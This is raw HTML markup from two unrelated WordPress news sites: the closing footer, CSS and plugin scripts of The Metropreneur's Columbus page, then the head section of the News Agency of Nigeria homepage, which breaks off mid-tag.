class="td-pb-row"> <div class="td-pb-span12"> </div> </div> <div class="td-pb-row"> <div class="td-pb-span12"> <div class="td-footer-info"><div class="footer-logo-wrap"><a href="https://themetropreneur.com/columbus/"><img class="td-retina-data" src="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/metro-logo-530x353.png" data-retina="https://themetropreneur.com/columbus/wp-content/uploads/2018/11/metro-logo-530x353.png" alt=""/></a></div><div class="footer-text-wrap">The Metropreneur is your online resource for all things related to small business development and entrepreneurialism in Central Ohio.</div><div class="footer-social-wrap td-social-style-2"><span class="td-social-icon-wrap"><a target="_blank" href="http://www.facebook.com/pages/The-Metropreneur/108348815867256" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://www.instagram.com/metropreneur/" title="Instagram"><i class="td-icon-font td-icon-instagram"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://www.linkedin.com/company/the-metropreneur" title="Linkedin"><i class="td-icon-font td-icon-linkedin"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="http://twitter.com/metropreneur" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></div></div><aside class="widget widget_text"> <div class="textwidget"><small>Disclaimer: The information provided at The Metropreneur is believed correct but is not warranted. All information is for informational purposes only and The Metropreneur, its owners, agents, and the developers of this web site assume no liability whatsoever associated with the use or misuse of the data contained herein. Rates & offers from advertisers shown on this website are not offers from or by The Metroprenuer and their terms change frequently, sometimes without notice. Visit referenced sites for current information. Per FTC guidelines, this website may be compensated by companies mentioned through advertising, affiliate programs or otherwise.</small></div> </aside> </div> </div> </div> </div> <!-- Sub Footer --> <div class="td-sub-footer-container"> <div class="td-container"> <div class="td-pb-row"> <div class="td-pb-span7 td-sub-footer-menu"> <div class="menu-newspaperfooter-container"><ul id="menu-newspaperfooter" class="td-subfooter-menu"><li id="menu-item-7786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-7786"><a href="https://themetropreneur.com/columbus/advertise-with-us/">Advertising</a></li> <li id="menu-item-7787" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-7787"><a href="https://themetropreneur.com/columbus/contact-us/">Contact</a></li> </ul></div> </div> <div class="td-pb-span5 td-sub-footer-copy"> &copy; 2019 - The Metropreneur </div> </div> </div> </div> </div><!--close content div--> </div><!--close td-outer-wrap--> <span style="display:none !important">2cee05f500c4397ef3c1ba1b502444eeZZZZ</span> <script> ( function ( body ) { 'use strict'; body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' ); } )( document.body ); </script> <!-- Theme: Newspaper by tagDiv 2015 Version: 6.6.1 (rara) Deploy mode: deploy uid: 5cdd84e9873c2 --> <!-- Custom css form theme panel --> <style type="text/css" media="screen"> /* custom css theme panel */ .td-header-wrap .black-menu .sf-menu > .current-menu-item > a, .td-header-wrap .black-menu .sf-menu > .current-menu-ancestor > a, .td-header-wrap .black-menu .sf-menu > .current-category-ancestor > a, .td-header-wrap .black-menu .sf-menu > li > a:hover, .td-header-wrap .black-menu .sf-menu > .sfHover > a, .td-header-style-12 .td-header-menu-wrap-full, .sf-menu > .current-menu-item > a:after, .sf-menu > .current-menu-ancestor > a:after, .sf-menu > .current-category-ancestor > a:after, .sf-menu > li:hover > a:after, .sf-menu > .sfHover > a:after, .sf-menu ul .td-menu-item > a:hover, .sf-menu ul .sfHover > a, .sf-menu ul .current-menu-ancestor > a, .sf-menu ul .current-category-ancestor > a, .sf-menu ul .current-menu-item > a, .td-header-style-12 .td-affix, .header-search-wrap .td-drop-down-search:after, .header-search-wrap .td-drop-down-search .btn:hover, input[type=submit]:hover, .td-read-more a, .td-post-category:hover, .td-grid-style-1.td-hover-1 .td-big-grid-post:hover .td-post-category, .td-grid-style-5.td-hover-1 .td-big-grid-post:hover .td-post-category, .td_top_authors .td-active .td-author-post-count, .td_top_authors .td-active .td-author-comments-count, .td_top_authors .td_mod_wrap:hover .td-author-post-count, .td_top_authors .td_mod_wrap:hover .td-author-comments-count, .td-404-sub-sub-title a:hover, .td-search-form-widget .wpb_button:hover, .td-rating-bar-wrap div, .td_category_template_3 .td-current-sub-category, .td-login-wrap .btn, .td_display_err, .td_display_msg_ok, .dropcap, .td_wrapper_video_playlist .td_video_controls_playlist_wrapper, .wpb_default, .wpb_default:hover, .td-left-smart-list:hover, .td-right-smart-list:hover, .woocommerce-checkout .woocommerce input.button:hover, .woocommerce-page .woocommerce a.button:hover, .woocommerce-account div.woocommerce .button:hover, #bbpress-forums button:hover, .bbp_widget_login .button:hover, .td-footer-wrapper .td-post-category, .td-footer-wrapper .widget_product_search input[type="submit"]:hover, .woocommerce .product a.button:hover, .woocommerce .product #respond input#submit:hover, .woocommerce .checkout input#place_order:hover, .woocommerce .woocommerce.widget .button:hover, .single-product .product .summary .cart .button:hover, .woocommerce-cart .woocommerce table.cart .button:hover, .woocommerce-cart .woocommerce .shipping-calculator-form .button:hover, .td-next-prev-wrap a:hover, .td-load-more-wrap a:hover, .td-post-small-box a:hover, .page-nav .current, .page-nav:first-child > div, .td_category_template_8 .td-category-header .td-category a.td-current-sub-category, .td_category_template_4 .td-category-siblings .td-category a:hover, #bbpress-forums .bbp-pagination .current, #bbpress-forums #bbp-single-user-details #bbp-user-navigation li.current a, .td-theme-slider:hover .slide-meta-cat a, a.vc_btn-black:hover, .td-trending-now-wrapper:hover .td-trending-now-title, .td-scroll-up-visible, .td-mobile-close a, .td-smart-list-button:hover, .td-weather-information:before, .td-weather-week:before { background-color: #2db698; } .woocommerce .woocommerce-message .button:hover, .woocommerce .woocommerce-error .button:hover, .woocommerce .woocommerce-info .button:hover { background-color: #2db698 !important; } .woocommerce .product .onsale, .woocommerce.widget .ui-slider .ui-slider-handle { background: none #2db698; } .woocommerce.widget.widget_layered_nav_filters ul li a { background: none repeat scroll 0 0 #2db698 !important; } a, cite a:hover, .td_mega_menu_sub_cats .cur-sub-cat, .td-mega-span h3 a:hover, .td_mod_mega_menu:hover .entry-title a, .header-search-wrap .result-msg a:hover, .top-header-menu li a:hover, .top-header-menu .current-menu-item > a, .top-header-menu .current-menu-ancestor > a, .top-header-menu .current-category-ancestor > a, .td-social-icon-wrap > a:hover, .td-header-sp-top-widget .td-social-icon-wrap a:hover, .td-page-content blockquote p, .td-post-content blockquote p, .mce-content-body blockquote p, .comment-content blockquote p, .wpb_text_column blockquote p, .td_block_text_with_title blockquote p, .td_module_wrap:hover .entry-title a, .td-subcat-filter .td-subcat-list a:hover, .td-subcat-filter .td-subcat-dropdown a:hover, .td_quote_on_blocks, .dropcap2, .dropcap3, .td_top_authors .td-active .td-authors-name a, .td_top_authors .td_mod_wrap:hover .td-authors-name a, .td-post-next-prev-content a:hover, .author-box-wrap .td-author-social a:hover, .td-author-name a:hover, .td-author-url a:hover, .td_mod_related_posts:hover h3 > a, .td-post-template-11 .td-related-title .td-related-left:hover, .td-post-template-11 .td-related-title .td-related-right:hover, .td-post-template-11 .td-related-title .td-cur-simple-item, .td-post-template-11 .td_block_related_posts .td-next-prev-wrap a:hover, .comment-reply-link:hover, .logged-in-as a:hover, #cancel-comment-reply-link:hover, .td-search-query, .td-category-header .td-pulldown-category-filter-link:hover, .td-category-siblings .td-subcat-dropdown a:hover, .td-category-siblings .td-subcat-dropdown a.td-current-sub-category, .td-login-wrap .td-login-info-text a:hover, .widget a:hover, .widget_calendar tfoot a:hover, .woocommerce a.added_to_cart:hover, #bbpress-forums li.bbp-header .bbp-reply-content span a:hover, #bbpress-forums .bbp-forum-freshness a:hover, #bbpress-forums .bbp-topic-freshness a:hover, #bbpress-forums .bbp-forums-list li a:hover, #bbpress-forums .bbp-forum-title:hover, #bbpress-forums .bbp-topic-permalink:hover, #bbpress-forums .bbp-topic-started-by a:hover, #bbpress-forums .bbp-topic-started-in a:hover, #bbpress-forums .bbp-body .super-sticky li.bbp-topic-title .bbp-topic-permalink, #bbpress-forums .bbp-body .sticky li.bbp-topic-title .bbp-topic-permalink, .widget_display_replies .bbp-author-name, .widget_display_topics .bbp-author-name, .footer-email-wrap a, .td-subfooter-menu li a:hover, .footer-social-wrap a:hover, a.vc_btn-black:hover, .td-mobile-content li a:hover, .td-mobile-content .sfHover > a, .td-mobile-content .current-menu-item > a, .td-mobile-content .current-menu-ancestor > a, .td-mobile-content .current-category-ancestor > a, .td-smart-list-dropdown-wrap .td-smart-list-button:hover { color: #2db698; } .td_login_tab_focus, a.vc_btn-black.vc_btn_square_outlined:hover, a.vc_btn-black.vc_btn_outlined:hover, .td-mega-menu-page .wpb_content_element ul li a:hover { color: #2db698 !important; } .td-next-prev-wrap a:hover, .td-load-more-wrap a:hover, .td-post-small-box a:hover, .page-nav .current, .page-nav:first-child > div, .td_category_template_8 .td-category-header .td-category a.td-current-sub-category, .td_category_template_4 .td-category-siblings .td-category a:hover, #bbpress-forums .bbp-pagination .current, .td-login-panel-title, .post .td_quote_box, .page .td_quote_box, a.vc_btn-black:hover { border-color: #2db698; } .td_wrapper_video_playlist .td_video_currently_playing:after { border-color: #2db698 !important; } .header-search-wrap .td-drop-down-search:before { border-color: transparent transparent #2db698 transparent; } .block-title > span, .block-title > a, .block-title > label, .widgettitle, .widgettitle:after, .td-trending-now-title, .td-trending-now-wrapper:hover .td-trending-now-title, .wpb_tabs li.ui-tabs-active a, .wpb_tabs li:hover a, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab.vc_active > a, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container .vc_tta-tab:hover > a, .td-related-title .td-cur-simple-item, .woocommerce .product .products h2, .td-subcat-filter .td-subcat-dropdown:hover .td-subcat-more { background-color: #2db698; } .woocommerce div.product .woocommerce-tabs ul.tabs li.active { background-color: #2db698 !important; } .block-title, .td-related-title, .wpb_tabs .wpb_tabs_nav, .vc_tta-container .vc_tta-color-grey.vc_tta-tabs-position-top.vc_tta-style-classic .vc_tta-tabs-container, .woocommerce div.product .woocommerce-tabs ul.tabs:before { border-color: #2db698; } .td_block_wrap .td-subcat-item .td-cur-simple-item { color: #2db698; } .td-grid-style-4 .entry-title { background-color: rgba(45, 182, 152, 0.7); } .td-footer-wrapper::before { background-image: url('https://23.111.159.229/columbus/wp-content/uploads/2016/05/back.jpg'); } </style> <script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};var tribe_system_info = {"sysinfo_optin_nonce":"bce18f0644","clipboard_btn_text":"Copy to clipboard","clipboard_copied_text":"System info copied","clipboard_fail_text":"Press \"Cmd + C\" to copy"};/* ]]> */ </script><script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/themetropreneur.com\/columbus\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var countVars = {"disqusShortname":"metropreneur"}; /* ]]> */ </script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/plugins/disqus-comment-system/public/js/comment_count.js?ver=3.0.17'></script> <script type='text/javascript'> /* <![CDATA[ */ var spuvar = {"is_admin":"","disable_style":"","ajax_mode":"","ajax_url":"https:\/\/themetropreneur.com\/columbus\/wp-admin\/admin-ajax.php","ajax_mode_url":"https:\/\/themetropreneur.com\/columbus\/?spu_action=spu_load","pid":"8902","is_front_page":"1","is_category":"","site_url":"https:\/\/themetropreneur.com\/columbus","is_archive":"","is_search":"","is_preview":"","seconds_confirmation_close":"5"}; var spuvar_social = []; /* ]]> */ </script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/plugins/popups/public/assets/js/public.js?ver=1.9.3.5'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/themes/Newspaper/js/tagdiv_theme.js?ver=6.6.1'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-includes/js/comment-reply.min.js?ver=6ec040'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-includes/js/wp-embed.min.js?ver=6ec040'></script> <script type='text/javascript' src='https://themetropreneur.com/columbus/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.7'></script> <!-- JS generated by theme --> <script> (function(){ var html_jquery_obj = jQuery('html'); if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) { var path = 'https://themetropreneur.com/columbus/wp-content/themes/themetropreneur2016/style.css'; jQuery.get(path, function(data) { var str_split_separator = '#td_css_split_separator'; var arr_splits = data.split(str_split_separator); var arr_length = arr_splits.length; if (arr_length > 1) { var dir_path = 'https://themetropreneur.com/columbus/wp-content/themes/Newspaper'; var splited_css = ''; for (var i = 0; i < arr_length; i++) { if (i > 0) { arr_splits[i] = str_split_separator + ' ' + arr_splits[i]; } //jQuery('head').append('<style>' + arr_splits[i] + '</style>'); var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) { return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,''); }); splited_css += "<style>" + formated_str + "</style>"; } var td_theme_css = jQuery('link#td-theme-css'); if (td_theme_css.length) { td_theme_css.after(splited_css); } } }); } })(); </script> </body> </html>
0
<!DOCTYPE html> <!--[if IE 9]><html class="lt-ie10 no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <html class="no-js flexbox" lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0" /> <meta name="google-site-verification" content="wRwRP4c1eQaEKBGXOCCCg4CAlnPyiUfdkLl9z4lXZb0" /> <meta name="msvalidate.01" content="B79DA3B893F4DAC5E0829482E0008E7F" /> <meta name="theme-color" content="#1193f6" /> <title>News Agency of Nigeria (NAN) - authoritative news as it breaks</title> <!-- This site is optimized with the Yoast SEO plugin v10.1.3 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="With substantial reach and mobility across the 36 states of the country, the News Agency of Nigeria (NAN) is always where the news is."/> <link rel="canonical" href="https://www.nan.ng/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="News Agency of Nigeria (NAN) - authoritative news as it breaks" /> <meta property="og:description" content="With substantial reach and mobility across the 36 states of the country, the News Agency of Nigeria (NAN) is always where the news is." /> <meta property="og:url" content="https://www.nan.ng/" /> <meta property="og:site_name" content="News Agency of Nigeria (NAN)" /> <meta property="og:image" content="https://s18694.pcdn.co/wp-content/uploads/2014/07/twiiterNAN.jpg" /> <meta property="og:image:secure_url" content="https://s18694.pcdn.co/wp-content/uploads/2014/07/twiiterNAN.jpg" /> <meta property="og:image:width" content="241" /> <meta property="og:image:height" content="241" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="With substantial reach and mobility across the 36 states of the country, the News Agency of Nigeria (NAN) is always where the news is." /> <meta name="twitter:title" content="News Agency of Nigeria (NAN) - authoritative news as it breaks" /> <meta name="twitter:site" content="@nanonlineng" /> <meta name="twitter:image" content="https://s18694.pcdn.co/wp-content/uploads/2014/07/twiiterNAN.jpg" /> <meta name="twitter:creator" content="@nanonlineng" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://www.nan.ng/#website","url":"https://www.nan.ng/","name":"News Agency of Nigeria (NAN)","potentialAction":{"@type":"SearchAction","target":"https://www.nan.ng/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Organization","url":"https://www.nan.ng/","sameAs":["http://facebook.com/NewsAgencyNigeria","https://www.youtube.com/channel/UC4_wKYII2PKPomxql2jfKgg","https://twitter.com/nanonlineng"],"@id":"https://www.nan.ng/#organization","name":"News Agency of Nigeria","logo":""}</script> <meta name="msvalidate.01" content="B79DA3B893F4DAC5E0829482E0008E7F" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.nan.ng' /> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="News Agency of Nigeria (NAN) &raquo; Feed" href="https://www.nan.ng/feed/" /> <link rel="alternate" type="application/rss+xml" title="News Agency of Nigeria (NAN) &raquo; Comments Feed" href="https://www.nan.ng/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="News Agency of Nigeria (NAN) &raquo; News Agency of Nigeria (NAN) Comments Feed" href="https://www.nan.ng/news-agency-nigeria-nan/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/s18694.pcdn.co\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='xt_likes_frontend_styles-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/likes/css/xt_likes.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/fontawesome/css/font-awesome.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome-extended-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/social-share/font-awesome/css/font-awesome-extended.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='xt-socialshare-styles-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/social-share/skins/default.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-ui-custom-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/jquery-ui.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='ajax-login-register-style-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/styles.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='ajax-login-register-login-style-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/login.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='ajax-login-register-register-style-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/modules/login-register/assets/register.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://s18694.pcdn.co/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='gmw-frontend-css' href='https://s18694.pcdn.co/wp-content/plugins/geo-my-wp/assets/css/gmw.frontend.min.css?ver=3.2.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='xt-widget-style-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/widgets/assets/common/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://s18694.pcdn.co/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='xt-icomoon-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/vendors/icomoon/icomoon.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='xt-defaults-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme/assets/css/defaults.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='xt-style-css' href='https://s18694.pcdn.co/wp-content/uploads/goodnews/style.min.css?ver=5.1.1' type='text/css' media='all' /> <style id='xt-style-inline-css' type='text/css'> body { background: #ffffff; } .full-top [class*="block-grid-"] > li { display: block; height: auto; float: left; padding: 0 0.625rem 1.25rem; margin: 0; } .site-namex .main-menu .top-bar-section > ul > li.active > a { color: #fff !important; background: #1193f6 !important; } .white-text a { color: #FFFFFF; } .latest-headline .xt-post-title { margin-top: -25px; margin-left: -1px; background: #dc4e41; padding: 10px 10px 10px; } .latest-headline .xt-post-title a { color: #ffffff; font-weight: 300; font-size: 30px; } .logo-bar { position: relative; z-index: 0; background: #ffffff; padding-top: 0; padding-left: inherit; padding-right: inherit; padding-bottom: 0; margin-top: 0; margin-left: 0; margin-right: 0; margin-bottom: 0; border-top-width: 0; border-bottom-width: 0; border-left-width: 0; border-right-width: 0; border-color: #fff; border-style: solid; } #main-header { position: relative; z-index: 5000; min-height: auto; } .top-menu .top-bar .toggle-topbar.menu-icon a::after { box-shadow: 0px 8px 0 2px #1193f6,0px 17px 0 2px #1193f6,0 26px 0 2px #000000; } .logo-bar .site-logo > img { max-height: 90px; } .logo-bar .site-logo { margin-left: inherit; margin-right: inherit; margin-top: 5px; margin-bottom: 5px; } .top-menu .top-bar .toggle-topbar.menu-icon a { width: 30px; overflow: hidden; padding: 0 25px; top: 50%; margin-top: -5px; } body #inner_wrapper { padding-top: 0px; padding-bottom: 80px; padding-left: 0; padding-right: 0; } time, .time, div.author, span.author { font-size: 13px; line-height: 17px; font-weight: 400; color: #b7b7b7; } .wp-caption .wp-caption-text, .entry-caption, .gallery-caption { font-size: 12px; line-height: 16px; font-style: italic; font-weight: 400; margin-top: 0px; } .page-header-row { height: auto; z-index: 1; position: relative; overflow: hidden; background: #FFFFFF; border-top-width: 0; border-bottom-width: 1px; border-left-width: 0; border-right-width: 0; border-color: #eee; border-style: solid; clear: both; } .th .icon-overlay .fa, div.gallery-icon .icon-overlay .fa, .prettyphoto .icon-overlay .fa, .has-background .icon-overlay .fa { color: #fff; font-weight: 300; position: absolute; top: 50%; left: 50%; margin-top: -25px; margin-left: -25px; font-size: 30px; width: 50px; height: 50px; -webkit-transition: opacity 0.5s ease-in-out,color 0.5s ease-in-out; -moz-transition: opacity 0.5s ease-in-out,color 0.5s ease-in-out; -ms-transition: opacity 0.5s ease-in-out,color 0.5s ease-in-out; -o-transition: opacity 0.5s ease-in-out,color 0.5s ease-in-out; transition: opacity 0.5s ease-in-out,color 0.5s ease-in-out; } [class^="fa-"], [class*=" fa-"] { font-family: FontAwesome,Fontello; } article .article-header { margin-bottom: 5px; padding-bottom: 5px; border-bottom: none; } .article-header-above .article-header .xt-post-title, .article-header-above .article-header .xt-post-excerpt { width: 100%; } .xtss-above-post { display: none; } .top-bar { background: #FFFFFF; } .widget.xt_news .news-list.list li, .widget.xt_news .news-list.featured-posts-2-col-style-2.list > li.last > .row { position: relative; border-bottom: 1px solid #e7e7e7; padding-bottom: 10px; margin-bottom: 10px !important; } article .article-header .xt-post-title { margin-top: 20px; margin-bottom: 20px; font-family: 'Open Sans'; font-weight: 300; font-size: 4.4375rem; line-height: 5rem; } article .post-body p, article .post-body ul:not(.news-list):not(.orbit-slider), article .post-body ol:not(.news-list), article .post-body dl, .mce-content-body p, .mce-content-body ul:not(.news-list):not(.orbit-slider), .mce-content-body ol:not(.news-list), .mce-content-body dl { font-family: "Arial"; font-weight: 400; font-size: 18px; line-height: 24px; text-align: left; color: #212121; margin-bottom: 30px; } @media only screen and (max-width: 849px) .inner_wrapper h3, .inner_wrapper .panel h3, .inner_wrapper .widget[id*='monster-widget'] h3 { font-size: 18px !important; line-height: 22px!important; background: #EDEDED !important; } @media (max-width: 768px) { .vc_row > .vc_col-sm-12 { padding-left: 0px !important; padding-right: 0px !important; } } .mobile-list .widget.xt_news .news-list.list li, .widget.xt_news .news-list.featured-posts-2-col-style-2.list > li.last > .row { position: relative; border-bottom: 1px solid #e7e7e7; padding-bottom: 5px; margin-bottom: 5px !important; } </style> <!--[if IE 9]> <link rel='stylesheet' id='xt-style-ie9-1-css' href='https://s18694.pcdn.co/wp-content/uploads/goodnews/style.min-1.css?ver=5.1.1' type='text/css' media='all' /> <![endif]--> <!--[if IE 9]> <link rel='stylesheet' id='xt-style-ie9-2-css' href='https://s18694.pcdn.co/wp-content/uploads/goodnews/style.min-2.css?ver=5.1.1' type='text/css' media='all' /> <![endif]--> <!--[if IE 9]> <link rel='stylesheet' id='xt-style-ie9-3-css' href='https://s18694.pcdn.co/wp-content/uploads/goodnews/style.min-3.css?ver=5.1.1' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='xt-child-style-css' href='https://s18694.pcdn.co/wp-content/themes/nantheme-child/style.css?ver=5.1.1' type='text/css' media='all' /> <link crossorigin="anonymous" rel='stylesheet' id='redux-google-fonts-goodnews-css' href='https://fonts.googleapis.com/css?family=Roboto%3A700%2C400%2C300%7COpen+Sans%3A400%2C700%2C600&#038;subset=latin&#038;ver=1549456322' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://s18694.pcdn.co/wp-content/plugins/jetpack/css/jetpack.css?ver=7.2.1' type='text/css' media='all' /> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/plugins/xt-galleria/galleria/galleria-1.4.2.min.js?ver=1.4.2' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/widgets/advanced-news/assets/widget.min.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/widgets/assets/common/js/conditional.js?ver=5.1.1' defer></script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/widgets/assets/xt_twitter/jquery.tweet.min.js?ver=5.1.1' defer></script> <script type='text/javascript'> /* <![CDATA[ */ var xt_twitter = {"modpath":"https:\/\/www.nan.ng\/?xt-widget-fetch=1"}; /* ]]> */ </script> <script type='text/javascript' src='https://s18694.pcdn.co/wp-content/themes/nantheme/lib/widgets/assets/xt_twitter/widget.min.js?ver=5.1.1' defer></script> <link rel='https://api.w.org/' href='https://www.nan.ng/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.nan.ng/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s18694.pcdn.co/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <link 